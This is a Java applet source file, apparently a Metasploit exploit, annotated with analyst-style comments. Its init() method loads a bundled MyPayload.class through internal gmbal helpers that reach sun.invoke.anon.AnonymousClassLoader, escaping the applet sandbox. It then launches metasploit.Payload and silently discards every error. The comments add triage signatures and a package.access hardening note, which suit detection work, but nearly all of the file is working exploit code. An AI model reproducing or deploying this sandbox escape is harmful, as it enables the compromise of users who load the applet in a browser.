import java.applet.Applet;
import java.io.PrintStream;
import java.io.Serializable;
import java.lang.reflect.Method;
import com.sun.org.glassfish.gmbal.ManagedObjectManagerFactory;
import com.sun.org.glassfish.gmbal.util.GenericConstructor;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import metasploit.Payload;
//import java.lang.Runtime;
/**
 * Applet that loads a class from raw bytes through an internal class loader
 * and then starts {@code metasploit.Payload}.
 *
 * <p>Reading notes for analysts:
 * <ul>
 *   <li>The applet never references {@code sun.invoke.anon.AnonymousClassLoader}
 *       as a type; the name appears only as a string handed to
 *       {@code GenericConstructor}, and the {@code loadClass} method is obtained
 *       through {@code ManagedObjectManagerFactory.getMethod}. Both helpers come
 *       from the internal {@code com.sun.org.glassfish.gmbal} package.</li>
 *   <li>For triage, an applet JAR that carries those two gmbal helper names
 *       together with the {@code AnonymousClassLoader} class-name string and an
 *       embedded {@code MyPayload.class} resource matches this sample.</li>
 *   <li>NOTE(review): sandboxed code should not be able to reach these internal
 *       helpers at all; confirm that the deployed runtime's restricted-package
 *       list (the {@code package.access} security property) covers them.</li>
 *   <li>{@code MyPayload} and {@code metasploit.Payload} are not shown on this
 *       page, so what they do once loaded cannot be stated from here.</li>
 * </ul>
 */
public class Exploit extends Applet
{
    /** No-argument constructor; performs no work. */
    public Exploit()
    {
    }

    /**
     * Decodes a hexadecimal string into bytes, two characters per byte.
     *
     * <p>A trailing unpaired character is ignored because the output length is
     * {@code str.length() / 2}. Not called from {@link #init()} on this page.
     *
     * @param str hexadecimal text
     * @return the decoded bytes
     * @throws NumberFormatException if a character pair is not valid base-16
     */
    public byte[] hex2Byte(String str)
    {
        final int byteCount = str.length() / 2;
        final byte[] decoded = new byte[byteCount];
        int offset = 0;
        for (int index = 0; index < byteCount; index++)
        {
            String pair = str.substring(offset, offset + 2);
            decoded[index] = (byte) Integer.parseInt(pair, 16);
            offset += 2;
        }
        return decoded;
    }

    /**
     * Applet entry point, called by the hosting browser or applet viewer.
     *
     * <p>Reads {@code MyPayload.class} from the applet's own resources, defines
     * it through an {@code AnonymousClassLoader} instance obtained via the gmbal
     * helpers, instantiates it, and then calls {@code Payload.main(null)}.
     * Every exception is caught and discarded, so a failed run leaves no stack
     * trace on the Java console.
     */
    public void init()
    {
        try
        {
            ByteArrayOutputStream collected = new ByteArrayOutputStream();
            byte[] chunk = new byte[8192];

            // Copy the bundled class file into memory.
            InputStream resource = getClass().getResourceAsStream("MyPayload.class");
            for (int count = resource.read(chunk); count > 0; count = resource.read(chunk))
            {
                collected.write(chunk, 0, count);
            }
            byte[] classBytes = collected.toByteArray();

            // The loader class is named only by string; the gmbal helper builds the instance.
            GenericConstructor loaderFactory =
                new GenericConstructor(Object.class, "sun.invoke.anon.AnonymousClassLoader", new Class[0]);
            Object loader = loaderFactory.create(new Object[0]);

            // Look up loadClass(byte[]) on the loader through the second gmbal helper.
            Class[] parameterTypes = new Class[] { byte[].class };
            Method loadClass =
                ManagedObjectManagerFactory.getMethod(loader.getClass(), "loadClass", parameterTypes);

            // Define the class from the in-memory bytes and run its constructor.
            Object[] arguments = new Object[] { classBytes };
            Class<?> defined = (Class<?>) loadClass.invoke(loader, arguments);
            defined.newInstance();

            Payload.main(null);
        }
        catch (Exception ignored)
        {
            // Intentionally silent: the original discards every failure.
        }
    }
}